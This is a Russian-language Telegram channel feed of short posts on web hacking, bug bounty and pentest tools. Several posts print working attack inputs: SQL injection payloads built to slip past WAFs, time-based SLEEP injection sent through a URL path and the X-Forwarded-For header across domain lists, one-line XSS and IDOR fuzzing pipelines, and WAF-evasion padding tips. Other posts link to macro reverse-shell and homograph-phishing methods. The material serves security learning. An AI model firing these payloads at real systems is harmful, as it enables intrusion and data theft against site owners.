White Hat
11.8K subscribers
952 photos
51 videos
16 files
1.03K links
Пишем про информационную безопасность и белый хакинг.

Сотрудничество: @workhouse_price

Канал на бирже: https://telega.in/c/kind_hack

Канал в реестре РКН: https://clck.ru/3FtTnR
Download Telegram
💉 Совет по обходу WAF для SQL-инъекций

Если вы пытаетесь выполнить SQL инъекцию и ее блокирует WAF, попробуйте использовать особенности Е-нотации в синтаксисе SQL. Таким образом, вы можете обфусцировать свой запрос и оказаться вне поля зрения WAF.

https://example.com/getUser?name=' or "=' (403 Forbidden)

https://example.com/getUser?name=' or 1337.e(")=' (200 OK)

#Web #WAF #SQLi
👍132🤔1
🔎 Поиск по облачным «хранилищам»

Сегодня предлагаю вам рассмотреть сервис, который осуществляет поиск по таким хранилищам как: Mega, Depositefiles, Dropbox, Turbo Bit, Vip-files и пр. Возможен поиск по 60 наиболее популярным облачным хранилищам.

Ссылка на инструмент

Если вам необходимо осуществить поиск по менее популярным хранилищам, типа Take File, Anonfiles, Keep2share, Ex-load и пр., то предлагаю рассмотреть другой сервис, который осуществляет поиск по более чем 100 различным ресурсам.

Ссылка на инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍51🔥1
Недавно выпустили плагин BurpSuite, который использует технологии искусственного интеллекта

Плагин генерирует имена для директорий, параметров и возможных файлов на основе запросов. Для генерации BruteForce листа используется OpenAI. Насколько это эффективно предстоит ещё проверить, но в целом — когда идей больше нет, можно обратиться к ней, чтобы получить "креатива".

На скрине показан пример как нейросеть может описать параметры, для отдельно взятого запроса и результат получается довольно достойным.

Ссылка на GitHub

#BurpSuite
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Практическая платформа для новичков Bug bounty

Бесплатный набор практических заданий от TheXSSRat, которые будут полезны новичкам и помогут вам проверить свои навыки в поиске и эксплуатации распространённых в Bug Bounty уязвимостей, таких как IDOR, XSS, CSRF и логические уязвимости.

Автор также обещает пополнения текущего списка заданий.

Ссылка на платформу

#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Используем скрытый функционал в свойствах документов Microsoft Office для получения реверс шелла | Привет, друг. На связи Эллиот

Макросы из офисных документов Windows активно используются злоумышленниками или исследователями безопасности для доставки полезной нагрузки на сервер и компрометации системы.

В статье по ссылке представлен рабочий метод создания макроса для документов Word и Excel и его использование для вызова другого объекта, расположенного в свойствах документа. В видео ниже продемонстрировано получение реверс шелла с помощью этого метода.

Ссылка на чтиво
Ссылка на видеоматериал

#Word #Excel #Windows
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
OpenSSF Scorecard

Тулза для автоматизации проверок безопасности проектов с открытым исходным кодом. Она помогает улучшить практики безопасности проектов и оценить, насколько безопасны их зависимости.

Scorecard оценивает важные критерии безопасности и присваивает каждому из них оценку от 0 до 10. Эти оценки можно использовать для улучшения безопасности проекта и принятия обоснованных решений о допустимости зависимостей.

Ссылка на GitHub

#Cybersecurity #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
🏃‍♂ Простое преобразование вывода в хэш для поиска IDOR

Иногда требуется конвертировать ввод в md5 / base64 / 32 и т.д непосредственно в консоле. Это бывает полезно, особенно когда вы ищите IDOR и конечная точка имеет значение в виде хэша, например:

https://targetdomain.com/user/3bf1114a986ba87ed28fc1b5884fc2f8

Для решения этой задачи, вы можете использовать простой bash-скрипт, совместно с ffuf.

Предположим, у вас есть конечная точка, которая принимает параметр id в виде md5. Мы можем проверить его на IDOR с помощью приведенной ниже команды, которая сгенерирует список чисел от 1 до 1000:

seq 1 1000 | hashit md5 | ffuf -w - -u https://targetdomain.com/user/FUZZ

#Web #IDOR #Bash
Please open Telegram to view this post
VIEW IN TELEGRAM
👍51🤮1
🩸 Находим XSS (и не только) на сайте одной командой

Для этого нам потребуется предварительно установить несколько утилит на языке GO (ну и соответсвенно сам GO тоже должен быть установлен).

Первая - gospider, представляющая собой веб-краулер для быстрого сбора URL-адресов, связанных с сайтом.

Вторая - qsreplace. Она принимает на вход URL-адреса и заменяет все значения строки запроса на значение, указанное пользователем.

Третья - dalfox. Это производительный и быстрый инструмент для анализа параметров запроса и выявления различных типов XSS и других базовых уязвимостей.

После установки необходимо заменить строку https://example.com на адрес тестируемого сайта и выполнить команду:

gospider -s https://example.com -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}' | grep "=" | qsreplace -a | dalfox pipe -o result.txt

#Web #XSS
👍72👏2👎1🔥1
Поиск Time-Based уязвимостей с httpx | Привет, друг. На связи Эллиот.

Когда нужно проверить список доменов на Time-Based уязвимости и лень писать шаблон для Nuclei, можно заюзать httpx с параметрами -timeout, для указания максимального таймаута и -mrt, для вывода только результатов с определенной задержкой.

cat web.list | httpx -silent -path '/sitemap.xml?offset=1%3bSELECT%20IF((8303%3E8302)%2cSLEEP(10)%2c2356)%23' -rt -timeout 20 -mrt '>10'

Аналогично, для заголовков:

cat web.list | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(10),0))OR" -rt -timeout 20 -mrt '>10'

#Web #SQLi #RCE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
🤛 Омографическая атака для фишинга

Эти атаки известны уже почти 20 лет, в их основе лежит принцип использования в доменных именах символов нелатинских алфавитов, внешне неотличимых от латинских букв.

В результате доменное имя выглядит как tᴡitter.com или clᴏudflare.com, однако переход по нему ведет на фальшивую страницу созданную для похищения логинов и паролей.

Для поиска доступных доменов, можно использовать Ditto - это небольшой инструмент, который принимает доменное имя в качестве входных данных и генерирует все его варианты для омографической атаки.

На выходе получаем список доменов, с отображением какие из них доступны, а какие уже зарегистрированы.

Ссылка на GitHub

#Web #Phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
👍81💩1
Circadian - фоновый демон GNU/Linux

Инструмент для автоматического запуска приостановки/сна/гибернации GNU/Linux

Circadian использует набор «эвристик простоя», чтобы определить, когда система простаивает.

К ним относятся:
▫️ Действия пользователя в X11 (клавиатура, мышь, полноэкранное воспроизведение)
▫️ Действия пользователя в терминалах (ввод в сеансе PTY/SSH)
▫️ Открытые SSH-соединения
▫️ Открытые соединения SMB/Samba
▫️ Открытые соединения NFS
▫️ Активное воспроизведение звука
▫️ Использование ЦП ниже указанного порога
▫️ Процессы из черного списка

Когда все его эвристики определят, что ваша система бездействовала достаточно долго, Circadian выполнит команду. Обычно это простая приостановка питания, но ее можно настроить на любое желаемое действие.

☝🏻Circadian также может запланировать автоматическое ежедневное пробуждение.

Просто установите время пробуждения в его файле конфигурации, и он будет просыпаться один раз в день в это время (если он еще не проснулся). Это позволяет легко обновлять и создавать резервные копии машины, даже если она редко используется.

📶 Он также может выполнить команду, когда обнаружит, что система вышла из спящего режима, независимо от того, почему она проснулась.

Ссылка на GitHub

#Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
👍101
Бот для отслеживания новых уязвимостей

Используйте этого бота для мониторинга новых CVE, содержащих определенные ключевые слова, и отправки оповещений в Slack и/или Telegram.

Можно быстро отслеживать появление новых XSS, RCE и тд, писать кастомные шаблоны для Nuclei и прогонять их по своему списку хостов.

Ссылка на GitHub

#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
📑 Инструмент поиска XSS в AngularJS

Инструмент SSTI-XSS-Finder позволяет собирать из Shodan поддомены, которые используют технологию AngularJS, и предоставляет нам полезную нагрузку XSS, связанную с AngularJS-версией этого поддомена.

./SSTI-XSS-Finder.sh <Shodan-Dork>

Примеры дорков:

org:target
hostname:target.com
net:127.0.0.1

Ссылка на GitHub

#Web #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2💩1
🏃‍♂ Инструмент: CRIU

Проект по реализации функций проверки/восстановления для GNU/Linux.

Используя этот инструмент, вы можете заморозить работающее приложение (или его часть) и сохранить его на жестком диске в виде набора файлов. Затем вы можете использовать файлы для восстановления и запуска приложения с того места, где оно было заморожено.

Отличительной особенностью проекта CRIU является то, что он преимущественно реализуется в пользовательском пространстве.

Ссылка на GitHub
Ссылка на оф. сайт

#Linux #restore
Please open Telegram to view this post
VIEW IN TELEGRAM
👍41💩1
📶 Мощный сканер веб-приложений, объединяющий широкий набор инструментов

reconFTW - это инструмент, предназначенный для выполнения автоматизированного сбора информации о целевом домене, путем запуска наилучшего набора инструментов для выполнения сканирования и выявления уязвимостей.

Он объединяет в себе множество популярных инструментов, которые мы уже рассматривали на канале. Подробнее о работе данного инструменты вы можете узнать на GitHub, но будьте уверены, инструмент заслуживает вашего внимания. Ниже представлена схема его работы.

Ссылка на GitHub

#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9💩1🍓1
🔎 Автоматический поиск SSRF уязвимостей

Для поиска SSRF на сайте можно воспользоваться инструментом под названием SSRFire. Просто укажите доменное имя сайта, адрес своего сервера (или Burp Collaborator) и ждите результатов.

Также есть опции для поиска XSS и Open Redirect. Для работы инструмента требуются установленные Python 3.7+ и GO.

Ссылка на GitHub

#Web #XSS #SSRF
Please open Telegram to view this post
VIEW IN TELEGRAM
👍43💩1
🔎 Инструменты для работы с дорками

Небольшая подборка инструментов, которые позволят вам автоматизировать процесс доркинга.

🗄 GitDorker
🗄 Katana
🗄 Fast-Google-Dorks-Scan
🗄 oxdork
🗄 SDorker
🗄 pagodo
🗄 dorks-eye

Online инструменты:

🗄 Dorksearch
🗄 FilePhish
🗄 Bug Bounty Helper
🗄 Pentest-tools google-hacking

#Web #Recon #Dork
Please open Telegram to view this post
VIEW IN TELEGRAM
💩2
🏳‍🌈 Инструмент: gip (гугл доркинг по IPv4)

Google IP Search - это инструмент OSINT, написанный на JavaScript и HTML. Он использует Google dorks для ограничения поиска только IPv4-адресами.

🗄 Ссылка на сайт
🗄 Ссылка на GitHub

#OSINT #Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍51💩1
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 Новый инструмент для скана портов и поиска уязвимостей

Новый инструмент командной строки от разработчиков Shodan для быстрого анализа списка IP-адресов и просмотра того, какие из них имеют открытые порты/уязвимости.

Ссылка на Gitlab

#Web #Recon #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3💩1
😈 Как перехватить трафик в коммутируемой среде?

Анализ сетевого трафика всегда был неотъемлемой частью работы любого сетевого инженера, администратора сети для выявления проблем работоспособности и конфигурации активного оборудования. В этой статье узнаете как же всё таки перехватить трафик.

https://telegra.ph/Kak-perehvatit-trafik-v-kommutiruemoj-srede-02-16
Please open Telegram to view this post
VIEW IN TELEGRAM
⚫️ Обход WAF через большое количество символов

Если вы столкнулись с WAF, то для POST, PUT или PATCH запросов попробуйте вставить в параметр бесполезные символы с произвольными данными, размером от 8 КБ до 10 МБ, ПЕРЕД вашей вредоносной полезной нагрузкой.

Некоторые WAF прекращают обработку после X символов полезной нагрузки, разрешая все ПОСЛЕ этого. Рандомные символы можно сгенерировать тут.

#WAF #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4